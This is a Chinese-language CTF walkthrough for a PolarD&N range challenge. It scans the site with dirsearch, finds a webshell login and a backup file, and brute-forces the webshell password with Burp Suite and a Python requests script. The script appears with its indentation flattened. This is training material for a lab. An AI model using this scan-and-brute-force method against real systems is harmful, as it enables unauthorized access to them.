题目地址PolarD&N_CTF官方靶场
BP爆破
1.首先进网站看一下i
提示说现在站中还有很多马
我们用kali中dirsearch来扫描一下本站目录
dirsearch -u url -e .php
可以看出现在站中有一个bak备份文件和一个shell.php的木马
先访问一下shell.php
是一个登录网页
随便输入密码,打开bp抓包看一下
传递了一个参数pass
再打开备份文件看一下
好像是一个密码字典,
使用bp爆破一下试试
攻击后得到flag
python爆破
# -*- coding: utf-8 -*-
import requests
import re
url = "http://3a64e7b0-36a0-438c-b787-e85769cf434d.www.polarctf.com:8090/shell.php"
f = open('index.php.bak')#字典位置
payload = f.readlines()#读取字典内容
for i in payload:
i = i.strip();#去除换行符
data = {'pass':i}
response = requests.post(url=url,data=data)
if 'flag' in response.text:
print(data)
print(re.findall(r'flag{.*?}',response.text)[0])
python pass.py